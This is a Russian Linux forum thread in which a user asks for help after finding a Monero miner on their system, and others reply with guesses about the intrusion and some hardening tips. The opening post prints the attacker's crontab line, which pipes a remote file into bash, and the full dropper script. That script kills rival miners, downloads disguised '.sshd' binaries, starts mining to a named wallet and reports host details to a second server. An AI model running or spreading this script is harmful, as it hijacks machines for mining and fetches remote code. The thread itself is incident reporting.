Взломали систему

Заметил необычно высокую загруженность проца, оказалось, что работает в системе майнер. После непродолжительных поисков нашел в кроне такую строчку:
1 * * * * wget -q -O - http://internetresearch.is/robots.txt 2>/dev/null|bash;
Скачивается вот этот файлик
x86_64="http://internetresearch.is/sshd"
i686="http://internetresearch.is/sshd.i686"

touch .test||cd /dev/shm||cd /tmp 2>/dev/null
>$MAIL&&chmod 000 $MAIL
rm .test 2>/dev/null
rm sshd* 2>/dev/null
pkill -9 xmrig 2>/dev/null
pid=$(pgrep -f -o 'tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8')
test $pid && pgrep -f 'tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8' | grep -vw $pid | xargs -r kill -9
pgrep -f tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8 && exit 0
wget --no-check-certificate "$x86_64" -O .sshd||curl -k "$x86_64" -o .sshd
wget --no-check-certificate "$i686" -O .sshd.i686||curl -k "$i686" -o .sshd.i686
chmod +x .sshd .sshd.i686
pgrep -f hashvault||./.sshd -o pool.monero.hashvault.pro:5555 -u 45e9rBtQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8crBXzPeGPLM6t8QE3s6JS5LNJUGMGmibF9yZhjVoCbUvz989EsT6h -p x -k -B||wget http://lochjol.com/FAIL -O /dev/null --user-agent "$(uname -p)"||curl http://lochjol.com/FAIL --user-agent "$(uname -p)"
pgrep -f hashvault||./.sshd.i686 -o pool.monero.hashvault.pro:5555 -u 45e9rBtQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8crBXzPeGPLM6t8QE3s6JS5LNJUGMGmibF9yZhjVoCbUvz989EsT6h -p x -k -B||wget http://lochjol.com/FAIL -O /dev/null --user-agent "$(uname -a)"||curl http://lochjol.com/FAIL --user-agent "$(uname -a)"
Процесс я прибил, команду в кроне удалил, но это наверное не все. Где еще проверить?
ты чо под рутом сидишь?
Псевдографический инсталлятор Arch Linux ver. 3.8.2
Благодарности принимаются на ЯД 410012815723874
Нет, но ему привилегий пользователя вполне достаточно.
Кстати, а у меня раз 3 - 5 за последние лет 5 вообще в наглую просто на секунду появлялся чужой рабочий стол с терминалом каким то исполнением команд и панелькой unity ubuntu слева и тут же пропадал, даже тему создавал. Пробовал переустанавливать с полным удалением всех конфигов, чистил вообще жесткий диск, не помогло вроде. Забил. Тогда, когда интересовался, помню, было такое, вроде уязвимости на уровне модема могут быть, вроде о стандартных huawei речь шла, вертикальных. Не знаю как где, а у нас в Ростовской области их тулили всем подключающимся к Ростелеком, типа в аренду с последующим выкупом.
pavelchavyr
Процесс я прибил, команду в кроне удалил, но это наверное не все. Где еще проверить?
Так запись в кроне жеж от пользователя не создать.
pavelchavyr
Скачивается вот этот файлик
А у меня wget даже не установлен.
https://t.me/arch_linuxru
Morisson
pavelchavyr
Процесс я прибил, команду в кроне удалил, но это наверное не все. Где еще проверить?
Так запись в кроне жеж от пользователя не создать.
Разве? Просто запускаться будет от имени пользователя, под которым создано задание.

Намного важнее определить источник заражения и принять меры.
Как вариант :
sudo chmod 740 /usr/bin/chmod
Вот как раз источник заражения меня и беспокоит, так как не могу его выявить. Подозреваю, что зашли через ssh, может даже просто сбрутфорсили, пароль слабый стоял. Однако в логах никаких записей подозрительных нет.
Еще одна жертва, свеженькая
Текст ссылки...
 
Зарегистрироваться или войдите чтобы оставить сообщение.